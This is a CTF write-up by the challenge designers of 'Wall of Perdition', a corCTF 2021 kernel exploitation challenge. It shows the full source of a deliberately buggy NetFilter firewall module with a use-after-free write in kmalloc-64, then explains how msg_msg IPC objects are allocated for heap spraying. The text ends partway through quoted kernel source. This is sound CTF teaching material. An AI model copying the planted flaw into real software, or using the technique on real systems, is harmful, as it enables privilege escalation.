Wall of Perdition is the second and harder part of a two part series of kernel exploitation challenges designed by FizzBuzz101 and me for corCTF 2021. You can find the writeup for the first part, Fire of Salvation, on his blog. Unfortunately, both challenges during competition remained unsolved. Wall of Perdition consists of a vulnerable Linux Kernel Module, the bug is a 0x30 bytes Use After Free Write in kmalloc-64. With this challenge, we present a new approach to transform the Linux kernel’s IPC mechanism, more specifically, message operations, in an exploitation toolkit. Let’s get started!

Overview

For this challenge, we decided to write a kernel firewall, based on NetFilter, controllable from user space via ioctl(). A user can add rules, edit rules, delete rules and duplicate rules (from inbound list to outbound list and vice versa).

We used the FGKASLR branch of the Linux kernel. Function Granular Kernel Address Space Layout Randomization, increases the level of protection offered by KASLR: while KASLR moves the entire kernel code text at a “random location” at boot time, FGKASLR rearranges the kernel code at load time on a per-function level granularity. This makes code reuse attacks very difficult to accomplish, as now knowing the kernel base address (due to a information leak for example) is no longer a sufficient condition to calculate the address of an arbitrary function.

Supervisor Mode Execution Prevention (SMEP) and Supervisor Mode Access Prevention (SMAP) are enabled, so it is neither possible to execute code in user space from kernel space, nor access data in higher CPU rings without using specific functions like copy_from_user() / copy_to_user() which turn off the SMAP flag of the CR4 register before accessing data in user space.

As additional protections, we set CONFIG_STATIC_USERMODEHELPER to true, forcing all usermode helper calls through a single binary, then we set CONFIG_STATIC_USERMODEHELPER_PATH to an empty sting. This way it is impossible to overwrite targets like modprobe_path, core_pattern and so on, to make the kernel execute an arbitrary binary.

Finally, we decided to use the SLAB allocator instead of SLUB to avoid any attempt of freelist poisoning, an attack that we will discuss in a future article. Freelist randomization was also enabled.

The challenge and kernel configuration can be found here: Wall of Perdition

A Buggy Linux Kernel Firewall

We decided to release the firewall source code, so players could directly focus on the exploitation phase. Here is the source code:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/device.h>
#include <linux/mutex.h>
#include <linux/fs.h>
#include <linux/slab.h>
#include <linux/miscdevice.h>
#include <linux/uaccess.h>
#include <linux/random.h>
#include <crypto/hash.h>
#include <linux/types.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>
#include <linux/net.h>
#include <linux/in.h>
#include <linux/skbuff.h>
#include <linux/ip.h>
#include <linux/inet.h>
#include <linux/tcp.h>
#include <linux/udp.h>


MODULE_AUTHOR("FizzBuzz and D3v17");
#ifdef EASY_MODE
MODULE_DESCRIPTION("Fire of Salvation");
#endif
#ifndef EASY_MODE
MODULE_DESCRIPTION("Wall of Perdition");
#endif
MODULE_LICENSE("GPL");


#define DEVICE_NAME "firewall"
#define CLASS_NAME  "firewall"

#define ADD_RULE 0x1337babe
#define DELETE_RULE 0xdeadbabe
#define EDIT_RULE 0x1337beef
#define SHOW_RULE 0xdeadbeef
#define DUP_RULE 0xbaad5aad

#define ERROR -1
#define SUCCESS 0
#define MAX_RULES 0x80

#define INBOUND 0
#define OUTBOUND 1
#define SKIP -1

#ifdef EASY_MODE
#define DESC_MAX 0x800
#endif


typedef struct
{
    char iface[16];
    char name[16];
    char ip[16];
    char netmask[16];
    uint8_t idx;
    uint8_t type;
    uint16_t proto;
    uint16_t port;
    uint8_t action;
    #ifdef EASY_MODE
    char desc[DESC_MAX];
    #endif
} user_rule_t;

typedef struct
{
    char iface[16];
    char name[16];
    uint32_t ip;
    uint32_t netmask;
    uint16_t proto;
    uint16_t port;
    uint8_t action;
    uint8_t is_duplicated;
    #ifdef EASY_MODE
    char desc[DESC_MAX];
    #endif
} rule_t;

rule_t **firewall_rules_in;
rule_t **firewall_rules_out;

static DEFINE_MUTEX(firewall_lock);

static long firewall_ioctl(struct file *file, unsigned int cmd, unsigned long arg);
static uint32_t firewall_inbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state);
static uint32_t firewall_outbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state);
static uint32_t process_rule(struct sk_buff *skb, rule_t *rule, uint8_t type, int i);
static long firewall_add_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_delete_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_edit_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_show_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);
static long firewall_dup_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx);

static struct miscdevice firewall_device;
static struct file_operations firewall_fops = {.unlocked_ioctl = firewall_ioctl};

static struct nf_hook_ops in_hook = {
    .hook        = firewall_inbound_hook,
    .hooknum     = NF_INET_PRE_ROUTING,
    .pf          = PF_INET,
    .priority    = NF_IP_PRI_FIRST
};

static struct nf_hook_ops out_hook = {
    .hook        = firewall_outbound_hook,
    .hooknum     = NF_INET_POST_ROUTING,
    .pf          = PF_INET,
    .priority    = NF_IP_PRI_FIRST
};


static long firewall_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
    int ret;
    user_rule_t user_rule;
    rule_t **firewall_rules;

    mutex_lock(&firewall_lock);
    memset(&user_rule, 0, sizeof(user_rule_t));

    if (copy_from_user((void *)&user_rule, (void *)arg, sizeof(user_rule_t)))
    {
        printk(KERN_INFO "[Firewall::Error] firewall_ioctl() cannot copy user request!\n");
        mutex_unlock(&firewall_lock);
        return ERROR;
    }

    if (user_rule.idx >= MAX_RULES)
    {
        printk(KERN_INFO "[Firewall::Info] firewall_ioctl() invalid index!\n");
        mutex_unlock(&firewall_lock);
        return ERROR;
    }

    if ((user_rule.type != INBOUND) && (user_rule.type != OUTBOUND))
    {
        printk(KERN_INFO "[Firewall::Error] firewall_ioctl() invalid rule type!\n");
        mutex_unlock(&firewall_lock);
        return ERROR;
    }

    firewall_rules = (user_rule.type == INBOUND) ? firewall_rules_in : firewall_rules_out;

    switch (cmd)
    {
        case ADD_RULE:
            ret = firewall_add_rule(user_rule, firewall_rules, user_rule.idx);
            break;

        case DELETE_RULE:
            ret = firewall_delete_rule(user_rule, firewall_rules, user_rule.idx);
            break;

        case SHOW_RULE:
            ret = firewall_show_rule(user_rule, firewall_rules, user_rule.idx);
            break;

        case EDIT_RULE:
            ret = firewall_edit_rule(user_rule, firewall_rules, user_rule.idx);
            break;

        case DUP_RULE:
            ret = firewall_dup_rule(user_rule, firewall_rules, user_rule.idx);
            break;

        default:
            ret = ERROR;
            break;
    }

    mutex_unlock(&firewall_lock);

    return ret;
}


static long firewall_add_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
    printk(KERN_INFO "[Firewall::Info] firewall_add_rule() adding new rule!\n");

    if (firewall_rules[idx] != NULL)
    {
        printk(KERN_INFO "[Firewall::Error] firewall_add_rule() invalid rule slot!\n");
        return ERROR;
    }

    firewall_rules[idx] = (rule_t *)kzalloc(sizeof(rule_t), GFP_KERNEL);

    if (!firewall_rules[idx])
    {
        printk(KERN_INFO "[Firewall::Error] firewall_add_rule() allocation error!\n");
        return ERROR;
    }

    memcpy(firewall_rules[idx]->iface, user_rule.iface, 16);
    memcpy(firewall_rules[idx]->name, user_rule.name, 16);

    #ifdef EASY_MODE
    strncpy(firewall_rules[idx]->desc, user_rule.desc, DESC_MAX);
    #endif

    if (in4_pton(user_rule.ip, strnlen(user_rule.ip, 16), (u8 *)&(firewall_rules[idx]->ip), -1, NULL) == 0)
    {
        printk(KERN_ERR "[Firewall::Error] firewall_add_rule() invalid IP format!\n");
        kfree(firewall_rules[idx]);
        firewall_rules[idx] = NULL;
        return ERROR;
    }

    if (in4_pton(user_rule.netmask, strnlen(user_rule.netmask, 16), (u8 *)&(firewall_rules[idx]->netmask), -1, NULL) == 0)
    {
        printk(KERN_ERR "[Firewall::Error] firewall_add_rule() invalid Netmask format!\n");
        kfree(firewall_rules[idx]);
        firewall_rules[idx] = NULL;
        return ERROR;
    }

    firewall_rules[idx]->proto = user_rule.proto;
    firewall_rules[idx]->port = ntohs(user_rule.port);
    firewall_rules[idx]->action = user_rule.action;
    firewall_rules[idx]->is_duplicated = 0;

    printk(KERN_ERR "[Firewall::Info] firewall_add_rule() new rule added!\n");

    return SUCCESS;
}


static long firewall_delete_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
    printk(KERN_INFO "[Firewall::Info] firewall_delete_rule() deleting rule!\n");

    if (firewall_rules[idx] == NULL)
    {
        printk(KERN_INFO "[Firewall::Error] firewall_delete_rule() invalid rule slot!\n");
        return ERROR;
    }

    kfree(firewall_rules[idx]); // [3]
    firewall_rules[idx] = NULL;

    return SUCCESS;
}


static long firewall_edit_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
    printk(KERN_INFO "[Firewall::Info] firewall_edit_rule() editing rule!\n");

    #ifdef EASY_MODE
    printk(KERN_INFO "[Firewall::Error] Note that description editing is not implemented.\n");
    #endif

    if (firewall_rules[idx] == NULL)
    {
        printk(KERN_INFO "[Firewall::Error] firewall_edit_rule() invalid idx!\n");
        return ERROR;
    }

    memcpy(firewall_rules[idx]->iface, user_rule.iface, 16);
    memcpy(firewall_rules[idx]->name, user_rule.name, 16);

    if (in4_pton(user_rule.ip, strnlen(user_rule.ip, 16), (u8 *)&(firewall_rules[idx]->ip), -1, NULL) == 0)
    {
        printk(KERN_ERR "[Firewall::Error] firewall_edit_rule() invalid IP format!\n");
        return ERROR;
    }

    if (in4_pton(user_rule.netmask, strnlen(user_rule.netmask, 16), (u8 *)&(firewall_rules[idx]->netmask), -1, NULL) == 0)
    {
        printk(KERN_ERR "[Firewall::Error] firewall_edit_rule() invalid Netmask format!\n");
        return ERROR;
    }

    firewall_rules[idx]->proto = user_rule.proto;
    firewall_rules[idx]->port = ntohs(user_rule.port);
    firewall_rules[idx]->action = user_rule.action;

    printk(KERN_ERR "[Firewall::Info] firewall_edit_rule() rule edited!\n");

    return SUCCESS;
}


static long firewall_show_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
    printk(KERN_INFO "[Firewall::Error] Function not implemented.\n");
    return ERROR;
}


static long firewall_dup_rule(user_rule_t user_rule, rule_t **firewall_rules, uint8_t idx)
{
    uint8_t i;
    rule_t **dup;

    printk(KERN_INFO "[Firewall::Info] firewall_dup_rule() duplicating rule!\n");

    dup = (user_rule.type == INBOUND) ? firewall_rules_out : firewall_rules_in;

    if (firewall_rules[idx] == NULL)
    {
        printk(KERN_INFO "[Firewall::Error] firewall_dup_rule() nothing to duplicate!\n");
        return ERROR;
    }

    if (firewall_rules[idx]->is_duplicated)
    {
        printk(KERN_INFO "[Firewall::Info] firewall_dup_rule() rule already duplicated before!\n");
        return ERROR;
    }

    for (i = 0; i < MAX_RULES; i++)
    {
        if (dup[i] == NULL)
        {
            dup[i] = firewall_rules[idx];
            firewall_rules[idx]->is_duplicated = 1;
            printk(KERN_INFO "[Firewall::Info] firewall_dup_rule() rule duplicated!\n");
            return SUCCESS;
        }
    }

    printk(KERN_INFO "[Firewall::Error] firewall_dup_rule() nowhere to duplicate!\n");

    return ERROR;
}


static uint32_t process_rule(struct sk_buff *skb, rule_t *rule, uint8_t type, int i)
{
    struct iphdr *iph;
    struct tcphdr *tcph;
    struct udphdr *udph;

    printk(KERN_INFO "[Firewall::Info] rule->iface: %s...\n", rule->iface);
    printk(KERN_INFO "[Firewall::Info] skb->dev->name: %s...\n", skb->dev->name);

    if (strncmp(rule->iface, skb->dev->name, 16) != 0)
    {
        printk(KERN_INFO "[Firewall::Error] Rule[%d], inferface doesn't match, skipping!\n", i);
        return SKIP;
    }

    iph = ip_hdr(skb);

    if (type == INBOUND)
    {
        if ((rule->ip & rule->netmask) != (iph->saddr & rule->netmask))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], ip->saddr doesn't belong to the provided subnet, skipping!\n", i);
            return SKIP;
        }
    }
    else
    {
        if ((rule->ip & rule->netmask) != (iph->daddr & rule->netmask))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], ip->daddr doesn't belong to the provided subnet, skipping!\n", i);
            return SKIP;
        }
    }

    if ((rule->proto == IPPROTO_TCP) && (iph->protocol == IPPROTO_TCP))
    {
        printk(KERN_INFO "[Firewall::Info] Rule[%d], protocol is TCP\n", i);

        tcph = tcp_hdr(skb);

        if ((rule->port != 0) && (rule->port != tcph->dest))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], rule->port (%d) != tcph->dest (%d), skipping!\n", i, ntohs(rule->port), ntohs(tcph->dest));
            return SKIP;
        }

        if ((rule->action != NF_DROP) && (rule->action != NF_ACCEPT))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], invalid action (%d), skipping!\n", i, rule->action);
            return SKIP;
        }

        printk(KERN_INFO "[Firewall::Info] %s Rule[%d], action %d\n", (type == INBOUND) ? "Inbound" : "Outbound", i, rule->action);

        return rule->action;
    }

    else if ((rule->proto == IPPROTO_UDP) && (iph->protocol == IPPROTO_UDP))
    {
        printk(KERN_INFO "[Firewall::Info] Rule[%d], protocol is UDP\n", i);

        udph = udp_hdr(skb);

        if ((rule->port != 0) && (rule->port != udph->dest))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], rule->port (%d) != udph->dest (%d), skipping!\n", i, ntohs(rule->port), ntohs(udph->dest));
            return SKIP;
        }

        if ((rule->action != NF_DROP) && (rule->action != NF_ACCEPT))
        {
            printk(KERN_INFO "[Firewall::Error] Rule[%d], invalid action (%d), skipping!\n", i, rule->action);
            return SKIP;
        }

        printk(KERN_INFO "[Firewall::Info] %s Rule[%d], action %d\n", (type == INBOUND) ? "Inbound" : "Outbound", i, rule->action);

        return rule->action;
    }

    return SKIP;
}


static uint32_t firewall_inbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
{
    int i;
    uint32_t ret;

    for (i = 0; i < MAX_RULES; i++)
    {
        if (firewall_rules_in[i])
        {
            ret = process_rule(skb, firewall_rules_in[i], INBOUND, i);

            if (ret != SKIP)
                return ret;
        }
    }

    return NF_ACCEPT;
}


static uint32_t firewall_outbound_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
{
    int i;
    uint32_t ret;

    for (i = 0; i < MAX_RULES; i++)
    {
        if (firewall_rules_out[i])
        {
            ret = process_rule(skb, firewall_rules_out[i], OUTBOUND, i);

            if (ret != SKIP)
                return ret;
        }
    }

    return NF_ACCEPT;
}


static int init_firewall(void)
{
    mutex_init(&firewall_lock);

    firewall_device.minor = MISC_DYNAMIC_MINOR;
    firewall_device.name = DEVICE_NAME;
    firewall_device.fops = &firewall_fops;

    if (misc_register(&firewall_device))
    {
        printk(KERN_INFO "[Firewall::Error] Device registration failed!\n");
        return ERROR;
    }

    printk(KERN_INFO "[Firewall::Init] Initializing firewall...\n");

    firewall_rules_in = kzalloc(sizeof(void *) * MAX_RULES, GFP_KERNEL);
    firewall_rules_out = kzalloc(sizeof(void *) * MAX_RULES, GFP_KERNEL);

    if (nf_register_net_hook(&init_net, &in_hook) < 0)
    {
        printk(KERN_INFO "[Firewall::Error] Cannot register nf hook!\n");
        return ERROR;
    }

    if (nf_register_net_hook(&init_net, &out_hook) < 0)
    {
        printk(KERN_INFO "[Firewall::Error] Cannot register nf hook!\n");
        return ERROR;
    }

    printk(KERN_INFO "[Firewall::Init] Firewall initialized!\n");
    #ifdef EASY_MODE
    printk(KERN_INFO "[Firewall::Init] 👼 Welcome to Easy Mode 👼\n");
    #else
    printk(KERN_INFO "[Firewall::Init] 😈 Welcome to Hard Mode 😈\n");
    #endif
    return SUCCESS;
}


static void cleanup_firewall(void)
{
    int i;

    printk(KERN_INFO "[Firewall::Exit] Cleaning up...\n");

    for (i = 0; i < MAX_RULES; i++)
    {
        if (firewall_rules_in[i] != NULL)
        {
            kfree(firewall_rules_in[i]);
        }

        if (firewall_rules_out[i] != NULL)
        {
            kfree(firewall_rules_out[i]);
        }
    }

    memset(firewall_rules_in, 0, sizeof(void *) * MAX_RULES);
    memset(firewall_rules_out, 0, sizeof(void *) * MAX_RULES);

    kfree(firewall_rules_in);
    firewall_rules_in = NULL;

    kfree(firewall_rules_out);
    firewall_rules_out = NULL;

    nf_unregister_net_hook(&init_net, &in_hook);
    nf_unregister_net_hook(&init_net, &out_hook);

    misc_deregister(&firewall_device);
    mutex_destroy(&firewall_lock);

    printk(KERN_INFO "[Firewall::Exit] Cleanup done, bye!\n");
}


module_init(init_firewall);
module_exit(cleanup_firewall);

As we mentioned in the introduction, a user can interact with the firewall using ioctl(). There are five exposed functions, add_rule() (line 184), delete rule() (line 236), edit_rule() (line 253), show_rule() (line 292) and duplicate_rule() (line 299). As we can see from source code, show_rule(), despite being exposed, is not implemented.

The firewall is based on NetFilter and it is using two NetFilter hooks, a prerouting hook to filter incoming packets (line 104) and a postrouting hook to filter outgoing packets (line 111). For this reason in the source code there are two lists of pointers to rules, firewall_rules_in (line 86) and firewall_rules_out. (line 87) Each list can contain up to 128 pointers to rules.

debug

The request format to interact with the firewall is defined by the type user_rule_t (line 69). IP address and Netmask are sent to the kernel in character buffers and are subsequently converted to integers in kernel space as we can see in add_rule() (line 209, 217) and edit_rule() (line 270, 276).

Other required fields include interface name, rule name, rule index, port, type (0 for inbound or 1 for outbound), protocol, and the action to be taken when there is a match in process_rule().

Once IP and Netmask have been converted to integers, the user request is transferred in a new structure handled by the kernel, defined by the type rule_t (line 84). This structure will be allocated in kmalloc-64, since its size is 0x30 bytes.

Because of the exploitation phase being relatively complex, we decided to make the bug very easy to spot. duplicate_rule() allows users to duplicate rules from the firewall_rules_in list to the firewall_rules_out list and vice versa.

The problem arises if we decide to duplicate a rule and then free it using delete_rule(). At line 246 delete_rule() will use kfree() to free the rule pointer and then will set it to NULL, but the same pointer will still be accessible in the other list.

This can lead to a 0x30 bytes Use After Free Write in kmalloc-64 using edit_rule() to modify the freed, but still accessible rule.

A Dive Into Linux Kernel’s IPC

To exploit the UAF in kmalloc-64, we are going abuse the Linux kernel’s IPC mechanism, more specifically, message operations.

The kernel offers two syscalls to perform Inter Process Communication using messages, msgsnd() and msgrcv(), respectively used to send messages to, and receive messages from a message queue.

A message in kernel space is composed by two parts, a message header, described by the structure msg_msg and message data, following immediately afterwards. Here is the msg_msg structure:

1
2
3
4
5
6
7
8
struct msg_msg {
    struct list_head m_list;
    long m_type;
    size_t m_ts;      /* message text size */
    struct msg_msgseg *next;
    void *security;
    /* the actual message follows immediately */
};

This elastic object is extensively used by kernel exploit developers to perform heap spray. The size of the message can be controlled by the user, therefore it can be allocated in multiple caches, starting from kmalloc-64 up to kmalloc-4k.

Every time msgsnd() is used to send a message, the kernel calls do_msgsnd(), which calls load_msg(), which in turn calls alloc_msg() to allocate the objects required to contain message header and message data.

The message content is subsequently copied from user space to kernel space in load_msg().

For example, let’s say we want to send a message consisting of 0x1fc8 ‘A’s: we first create a message queue using msgget() then we send the actual message using msgsnd():

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
[...]

struct msgbuf
{
    long mtype;
    char mtext[0x1fc8];
} msg;

msg.mtype = 1;
memset(msg.mtext, 'A', sizeof(msg.mtext));

qid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT));
msgsnd(qid, &msg, sizeof(msg.mtext), 0);

[...]

Now let’s examine the source code of alloc_msg() and load_msg() to understand what happens in kernel space:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
static struct msg_msg *alloc_msg(size_t len)
{
    struct msg_msg *msg;
    struct msg_msgseg **pseg;
    size_t alen;

    alen = min(len, DATALEN_MSG); // [1]
    msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT); // [2]
    if (msg == NULL)
        return NULL;

    msg->next = NULL;
    msg->security = NULL;

    len -= alen; // [3]
    pseg = &msg->next;
    while (len > 0) {
        struct msg_msgseg *seg;

        cond_resched();

        alen = min(len, DATALEN_SEG); // [4]
        seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT); // [5]
        if (seg == NULL)
            goto out_err;
        *pseg = seg; // [6]
        seg->next = NULL;
        pseg = &seg->next;
        len -= alen;
    }

    return msg;

out_err:
    free_msg(msg);
    return NULL;
}

As we can see in the source code above, in alloc_msg(), the kernel calculates alen = min(len, DATALEN_MSG); [1], where len is the message size provided by the user, 0x1fc8 in our case, and DATALEN_MSG corresponds to ((size_t)PAGE_SIZE - sizeof(struct msg_msg)).

By default PAGE_SIZE is equal to 0x1000 bytes, and sizeof(struct msg_msg) is equal to 0x30 bytes, therefore DATALEN_MSG corresponds to 0xfd0 bytes, and that line, in our case, will result in alen = min(0x1fc8, 0xfd0) = 0xfd0.

At the next line, the kernel allocates the message using msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT); [2]. Here sizeof(*msg) is equal to 0x30 bytes (basically the message header size) and alen, as we discussed above, is equal to 0xfd0. That line, in our case, will be equal to msg = kmalloc(0x1000, GFP_KERNEL_ACCOUNT);: this message will be allocated in kmalloc-4k.

After a couple of lines, len, the message size provided by the user, is decremented by alen [3], then the kernel starts allocating all necessary segments to store the remaining data until len is equal to zero. Segments are connected in a singly linked list.

The size of a segment is calculated by alen = min(len, DATALEN_SEG); [4], basically min(ramaining size, DATALEN_SEG). In our case, len was decremented by alen, therefore corresponds to len = len - alen = 0x1fc8 - 0xfd0 = 0xff8.

DATALEN_SEG is defined as ((size_t)PAGE_SIZE - sizeof(struct msg_msgseg)) and since sizeof(struct msg_msgseg) is equal to 0x8 bytes, DATALEN_SEG corresponds to 0xff8 bytes. That line will result in alen = min(0xff8, 0xff8) = 0xff8;.

At the next line, the segment is allocated using seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT); [5]. Since sizeof(*seg) is equal to 0x8 bytes and alen now is 0xff8, that line will be equal to seg = kmalloc(0x1000, GFP_KERNEL_ACCOUNT);. Even this segment, will be allocated in kmalloc-4k.

Finally segment pointer is saved in the message header [6], and the function can return the pointer to the message.

At this point load_msg() is ready to copy the message content from user space to kernel space:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
struct msg_msg *load_msg(const void __user *src, size_t len)
{
    struct msg_msg *msg;
    struct msg_msgseg *seg;
    int err = -EFAULT;
    size_t alen;

    msg = alloc_msg(len); // [1]
    if (msg == NULL)
        return ERR_PTR(-ENOMEM);

    alen = min(len, DATALEN_MSG);
    if (copy_from_user(msg + 1, src, alen)) // [2]
        goto out_err;

    for (seg = msg->next; seg != NULL; seg = seg->next) {
        len -= alen;
        src = (char __user *)src + alen;
        alen = min(len, DATALEN_SEG);
        if (copy_from_user(seg + 1, src, alen)) // [3]
            goto out_err;
    }

    err = security_msg_msg_alloc(msg);
    if (err)
        goto out_err;

    return msg;

out_err:
    free_msg(msg);
    return ERR_PTR(err);
}

As we can see from the load_msg() source code, after allocating the message using alloc_msg() [1], it starts copying the message data from user space to the allocated memory region in kernel space [2].

Then it copies the remaining data into segments [3]. In our case it will copy the first 0xfd0 bytes in the first message, and the rest, 0xff8 bytes, in the segment.

Of course in our case, we only have a single segment, so its pointer to the next segment will be NULL.

Here is our message in kernel memory:

debug

And here is the corresponding segment:

debug

Now let’s see what happens when we use msgrcv() to receive the message:

1
2
void *memdump = malloc(0x1fc8);
msgrcv(qid, memdump, 0x1fc8, 1, IPC_NOWAIT | MSG_NOERROR);

First, the kernel calls do_msgrcv(), setting its sixth argument, the msg_handler() function pointer, to do_msg_fill() as we can see in ksys_msgrcv():

1
2
3
4
5
long ksys_msgrcv(int msqid, struct msgbuf __user *msgp, size_t msgsz,
            long msgtyp, int msgflg)
{
    return do_msgrcv(msqid, msgp, msgsz, msgtyp, msgflg, do_msg_fill);
}

Later on, do_msg_fill() will be used to copy the message from kernel space to user space. Here is the source code of do_msgrcv():

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
static long do_msgrcv(int msqid, void __user *buf, size_t bufsz, long msgtyp, int msgflg,
            long (*msg_handler)(void __user *, struct msg_msg *, size_t))
{
    int mode;
    struct msg_queue *msq;
    struct ipc_namespace *ns;
    struct msg_msg *msg, *copy = NULL;
    DEFINE_WAKE_Q(wake_q);

    ns = current->nsproxy->ipc_ns;

    if (msqid < 0 || (long) bufsz < 0)
        return -EINVAL;

    if (msgflg & MSG_COPY) {
        if ((msgflg & MSG_EXCEPT) || !(msgflg & IPC_NOWAIT))
            return -EINVAL;
        copy = prepare_copy(buf, min_t(size_t, bufsz, ns->msg_ctlmax)); // [4]
        if (IS_ERR(copy))
            return PTR_ERR(copy);
    }
    mode = convert_mode(&msgtyp, msgflg);

    rcu_read_lock();
    msq = msq_obtain_object_check(ns, msqid);
    if (IS_ERR(msq)) {
        rcu_read_unlock();
        free_copy(copy);
        return PTR_ERR(msq);
    }

    for (;;) {
        struct msg_receiver msr_d;

        msg = ERR_PTR(-EACCES);
        if (ipcperms(ns, &msq->q_perm, S_IRUGO))
            goto out_unlock1;

        ipc_lock_object(&msq->q_perm);

        /* raced with RMID? */
        if (!ipc_valid_object(&msq->q_perm)) {
            msg = ERR_PTR(-EIDRM);
            goto out_unlock0;
        }

        msg = find_msg(msq, &msgtyp, mode); // [1]
        if (!IS_ERR(msg)) {
            /*
                * Found a suitable message.
                * Unlink it from the queue.
                */
            if ((bufsz < msg->m_ts) && !(msgflg & MSG_NOERROR)) {
                msg = ERR_PTR(-E2BIG);
                goto out_unlock0;
            }
            /*
                * If we are copying, then do not unlink message and do
                * not update queue parameters.
                */
            if (msgflg & MSG_COPY) {
                msg = copy_msg(msg, copy); // [5]
                goto out_unlock0;
            }

            list_del(&msg->m_list);
            msq->q_qnum--;
            msq->q_rtime = ktime_get_real_seconds();
            ipc_update_pid(&msq->q_lrpid, task_tgid(current));
            msq->q_cbytes -= msg->m_ts;
            atomic_sub(msg->m_ts, &ns->msg_bytes);
            atomic_dec(&ns->msg_hdrs);
            ss_wakeup(msq, &wake_q, false);

            goto out_unlock0;
        }

        /* No message waiting. Wait for a message */
        if (msgflg & IPC_NOWAIT) {
            msg = ERR_PTR(-ENOMSG);
            goto out_unlock0;
        }

        list_add_tail(&msr_d.r_list, &msq->q_receivers);
        msr_d.r_tsk = current;
        msr_d.r_msgtype = msgtyp;
        msr_d.r_mode = mode;
        if (msgflg & MSG_NOERROR)
            msr_d.r_maxsize = INT_MAX;
        else
            msr_d.r_maxsize = bufsz;

        /* memory barrier not require due to ipc_lock_object() */
        WRITE_ONCE(msr_d.r_msg, ERR_PTR(-EAGAIN));

        /* memory barrier not required, we own ipc_lock_object() */
        __set_current_state(TASK_INTERRUPTIBLE);

